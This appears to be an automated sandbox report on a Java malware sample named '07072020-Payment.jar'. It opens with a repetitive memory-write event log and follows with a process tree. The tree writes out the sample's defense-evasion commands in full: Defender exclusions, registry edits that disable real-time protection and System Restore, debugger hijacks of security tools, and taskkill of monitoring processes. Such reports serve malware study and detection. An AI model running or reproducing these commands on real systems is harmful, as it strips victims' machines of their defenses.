796 1164 java.exe 285 PID 1164 wrote to memory of 796 1164 java.exe 285 PID 1164 wrote to memory of 796 1164 java.exe 285 PID 796 wrote to memory of 888 796 cmd.exe 286 PID 796 wrote to memory of 888 796 cmd.exe 286 PID 796 wrote to memory of 888 796 cmd.exe 286 PID 1164 wrote to memory of 1496 1164 java.exe 287 PID 1164 wrote to memory of 1496 1164 java.exe 287 PID 1164 wrote to memory of 1496 1164 java.exe 287 PID 796 wrote to memory of 1984 796 cmd.exe 289 PID 796 wrote to memory of 1984 796 cmd.exe 289 PID 796 wrote to memory of 1984 796 cmd.exe 289 PID 1164 wrote to memory of 1932 1164 java.exe 290 PID 1164 wrote to memory of 1932 1164 java.exe 290 PID 1164 wrote to memory of 1932 1164 java.exe 290 PID 1932 wrote to memory of 2004 1932 cmd.exe 291 PID 1932 wrote to memory of 2004 1932 cmd.exe 291 PID 1932 wrote to memory of 2004 1932 cmd.exe 291 PID 1932 wrote to memory of 1828 1932 cmd.exe 292 PID 1932 wrote to memory of 1828 1932 cmd.exe 292 PID 1932 wrote to memory of 1828 1932 cmd.exe 292 PID 1164 wrote to memory of 848 1164 java.exe 293 PID 1164 wrote to memory of 848 1164 java.exe 293 PID 1164 wrote to memory of 848 1164 java.exe 293 PID 848 wrote to memory of 1648 848 cmd.exe 294 PID 848 wrote to memory of 1648 848 cmd.exe 294 PID 848 wrote to memory of 1648 848 cmd.exe 294 PID 848 wrote to memory of 1572 848 cmd.exe 295 PID 848 wrote to memory of 1572 848 cmd.exe 295 PID 848 wrote to memory of 1572 848 cmd.exe 295 PID 1164 wrote to memory of 1636 1164 java.exe 296 PID 1164 wrote to memory of 1636 1164 java.exe 296 PID 1164 wrote to memory of 1636 1164 java.exe 296 PID 1636 wrote to memory of 1900 1636 cmd.exe 297 PID 1636 wrote to memory of 1900 1636 cmd.exe 297 PID 1636 wrote to memory of 1900 1636 cmd.exe 297 PID 1636 wrote to memory of 1972 1636 cmd.exe 298 PID 1636 wrote to memory of 1972 1636 cmd.exe 298 PID 1636 wrote to memory of 1972 1636 cmd.exe 298 PID 1164 wrote to memory of 524 1164 java.exe 299 PID 1164 wrote to memory of 524 1164 java.exe 299 PID 1164 wrote to memory of 524 1164 java.exe 299 PID 524 wrote to memory of 1984 524 cmd.exe 300 PID 524 wrote to memory of 1984 524 cmd.exe 300 PID 524 wrote to memory of 1984 524 cmd.exe 300 PID 524 wrote to memory of 2036 524 cmd.exe 301 PID 524 wrote to memory of 2036 524 cmd.exe 301 PID 524 wrote to memory of 2036 524 cmd.exe 301 PID 1164 wrote to memory of 268 1164 java.exe 302 PID 1164 wrote to memory of 268 1164 java.exe 302 PID 1164 wrote to memory of 268 1164 java.exe 302 PID 268 wrote to memory of 2044 268 cmd.exe 303 PID 268 wrote to memory of 2044 268 cmd.exe 303 PID 268 wrote to memory of 2044 268 cmd.exe 303 PID 268 wrote to memory of 1904 268 cmd.exe 304 PID 268 wrote to memory of 1904 268 cmd.exe 304 PID 268 wrote to memory of 1904 268 cmd.exe 304 PID 1164 wrote to memory of 1384 1164 java.exe 305 PID 1164 wrote to memory of 1384 1164 java.exe 305 PID 1164 wrote to memory of 1384 1164 java.exe 305 PID 1384 wrote to memory of 2032 1384 cmd.exe 306 PID 1384 wrote to memory of 2032 1384 cmd.exe 306 PID 1384 wrote to memory of 2032 1384 cmd.exe 306 PID 1384 wrote to memory of 1692 1384 cmd.exe 307 PID 1384 wrote to memory of 1692 1384 cmd.exe 307 PID 1384 wrote to memory of 1692 1384 cmd.exe 307 PID 1164 wrote to memory of 1572 1164 java.exe 308 PID 1164 wrote to memory of 1572 1164 java.exe 308 PID 1164 wrote to memory of 1572 1164 java.exe 308 PID 1572 wrote to memory of 1800 1572 cmd.exe 309 PID 1572 wrote to memory of 1800 1572 cmd.exe 309 PID 1572 wrote to memory of 1800 1572 cmd.exe 309 PID 1572 wrote to memory of 1952 1572 cmd.exe 310 PID 1572 wrote to memory of 1952 1572 cmd.exe 310 PID 1572 wrote to memory of 1952 1572 cmd.exe 310 PID 1164 wrote to memory of 1888 1164 java.exe 311 PID 1164 wrote to memory of 1888 1164 java.exe 311 PID 1164 wrote to memory of 1888 1164 java.exe 311 PID 1888 wrote to memory of 300 1888 cmd.exe 312 PID 1888 wrote to memory of 300 1888 cmd.exe 312 PID 1888 wrote to memory of 300 1888 cmd.exe 312 PID 1888 wrote to memory of 1956 1888 cmd.exe 313 PID 1888 wrote to memory of 1956 1888 cmd.exe 313 PID 1888 wrote to memory of 1956 1888 cmd.exe 313 PID 1164 wrote to memory of 544 1164 java.exe 314 PID 1164 wrote to memory of 544 1164 java.exe 314 PID 1164 wrote to memory of 544 1164 java.exe 314 PID 544 wrote to memory of 768 544 cmd.exe 315 PID 544 wrote to memory of 768 544 cmd.exe 315 PID 544 wrote to memory of 768 544 cmd.exe 315 PID 544 wrote to memory of 1560 544 cmd.exe 316 PID 544 wrote to memory of 1560 544 cmd.exe 316 PID 544 wrote to memory of 1560 544 cmd.exe 316 PID 1164 wrote to memory of 1100 1164 java.exe 317 PID 1164 wrote to memory of 1100 1164 java.exe 317 PID 1164 wrote to memory of 1100 1164 java.exe 317 PID 1100 wrote to memory of 1028 1100 cmd.exe 318 PID 1100 wrote to memory of 1028 1100 cmd.exe 318 PID 1100 wrote to memory of 1028 1100 cmd.exe 318 PID 1100 wrote to memory of 1332 1100 cmd.exe 319 PID 1100 wrote to memory of 1332 1100 cmd.exe 319 PID 1100 wrote to memory of 1332 1100 cmd.exe 319 PID 1164 wrote to memory of 608 1164 java.exe 320 PID 1164 wrote to memory of 608 1164 java.exe 320 PID 1164 wrote to memory of 608 1164 java.exe 320 PID 608 wrote to memory of 1672 608 cmd.exe 321 PID 608 wrote to memory of 1672 608 cmd.exe 321 PID 608 wrote to memory of 1672 608 cmd.exe 321 PID 608 wrote to memory of 2012 608 cmd.exe 322 PID 608 wrote to memory of 2012 608 cmd.exe 322 PID 608 wrote to memory of 2012 608 cmd.exe 322 PID 1164 wrote to memory of 612 1164 java.exe 323 PID 1164 wrote to memory of 612 1164 java.exe 323 PID 1164 wrote to memory of 612 1164 java.exe 323 PID 612 wrote to memory of 1412 612 cmd.exe 324 PID 612 wrote to memory of 1412 612 cmd.exe 324 PID 612 wrote to memory of 1412 612 cmd.exe 324 PID 612 wrote to memory of 1840 612 cmd.exe 325 PID 612 wrote to memory of 1840 612 cmd.exe 325 PID 612 wrote to memory of 1840 612 cmd.exe 325 PID 1164 wrote to memory of 576 1164 java.exe 326 PID 1164 wrote to memory of 576 1164 java.exe 326 PID 1164 wrote to memory of 576 1164 java.exe 326 PID 1164 wrote to memory of 1520 1164 java.exe 328 PID 1164 wrote to memory of 1520 1164 java.exe 328 PID 1164 wrote to memory of 1520 1164 java.exe 328 PID 1164 wrote to memory of 1312 1164 java.exe 330 PID 1164 wrote to memory of 1312 1164 java.exe 330 PID 1164 wrote to memory of 1312 1164 java.exe 330 PID 1164 wrote to memory of 1536 1164 java.exe 332 PID 1164 wrote to memory of 1536 1164 java.exe 332 PID 1164 wrote to memory of 1536 1164 java.exe 332 PID 1164 wrote to memory of 2036 1164 java.exe 334 PID 1164 wrote to memory of 2036 1164 java.exe 334 PID 1164 wrote to memory of 2036 1164 java.exe 334 PID 1164 wrote to memory of 1496 1164 java.exe 336 PID 1164 wrote to memory of 1496 1164 java.exe 336 PID 1164 wrote to memory of 1496 1164 java.exe 336 PID 1164 wrote to memory of 1964 1164 java.exe 338 PID 1164 wrote to memory of 1964 1164 java.exe 338 PID 1164 wrote to memory of 1964 1164 java.exe 338 PID 1164 wrote to memory of 1660 1164 java.exe 340 PID 1164 wrote to memory of 1660 1164 java.exe 340 PID 1164 wrote to memory of 1660 1164 java.exe 340 PID 1164 wrote to memory of 892 1164 java.exe 342 PID 1164 wrote to memory of 892 1164 java.exe 342 PID 1164 wrote to memory of 892 1164 java.exe 342
Processes
-
C:\Windows\system32\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\07072020-Payment.jar1⤵
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of SetWindowsHookEx
- Drops file in System32 directory
- Adds Run entry to start application
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Windows\system32\cmd.execmd.exe2⤵PID:1628
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:804 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:764
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1080
-
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
PID:1720
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
PID:1828
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\PXBiH\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1840
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\PXBiH\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1264
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\PXBiH2⤵
- Views/modifies file attributes
PID:1808
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\PXBiH2⤵
- Views/modifies file attributes
PID:1856
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\PXBiH2⤵
- Views/modifies file attributes
PID:1800
-
-
C:\Windows\system32\attrib.exeattrib +h +s +r C:\Users\Admin\PXBiH\qMaee.class2⤵
- Views/modifies file attributes
PID:1872
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵
- Checks for installed software on the system
PID:1904
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵
- Checks for installed software on the system
PID:544
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\PXBiH','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\PXBiH\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1644
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F2⤵
- Kills process with taskkill
PID:1556
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
PID:1588
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f2⤵PID:1924
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
PID:1952
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f2⤵PID:2016
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
PID:2028
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f2⤵
- System policy modification
PID:624
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:524
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵
- Checks for installed software on the system
PID:864
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵
- Checks for installed software on the system
PID:2004
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
PID:592
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f2⤵
- System policy modification
PID:584
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
PID:612
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:1084
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:1532
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
PID:1836
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f2⤵PID:1860
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F2⤵
- Kills process with taskkill
PID:1632
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f2⤵PID:1856
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
PID:1104
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f2⤵PID:1936
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
PID:1988
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1924
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
PID:2024
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
PID:568
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:760
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1712
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
PID:1304
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
PID:1796
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
PID:1832
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:768
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
PID:1112
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
PID:1844
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
PID:1980
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
PID:1520
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
PID:2044
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
PID:1692
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
PID:1516
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:1056
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
PID:1264
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
PID:1100
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1968
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵
- Checks for installed software on the system
PID:1884
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵PID:1956
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:332
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵PID:1520
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵PID:760
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2028
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵PID:892
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵PID:284
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:300
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵PID:268
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵PID:1516
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1104
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵PID:1476
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵PID:1808
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1948
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵PID:1504
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵PID:1556
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1796
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵PID:1120
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵PID:1704
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1800
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵PID:796
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵PID:2012
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:1816
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1764
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵PID:1824
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵PID:1264
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1944
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵PID:2036
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵PID:1412
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1876
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵PID:1960
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵PID:776
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:612
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵
- Checks for installed software on the system
PID:864
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵PID:1904
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1292
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵
- Checks for installed software on the system
PID:660
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵PID:1588
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:768
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵PID:1964
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵PID:1116
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1520
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:643⤵
- Checks for installed software on the system
PID:764
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:323⤵PID:1976
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:284
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:643⤵PID:1680
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:323⤵PID:592
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1080
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:643⤵
- Checks for installed software on the system
PID:1476
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:323⤵PID:1888
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:344
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:643⤵PID:1556
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:323⤵PID:1380
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1856
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:643⤵
- Checks for installed software on the system
PID:1636
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:323⤵PID:1840
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1576
-
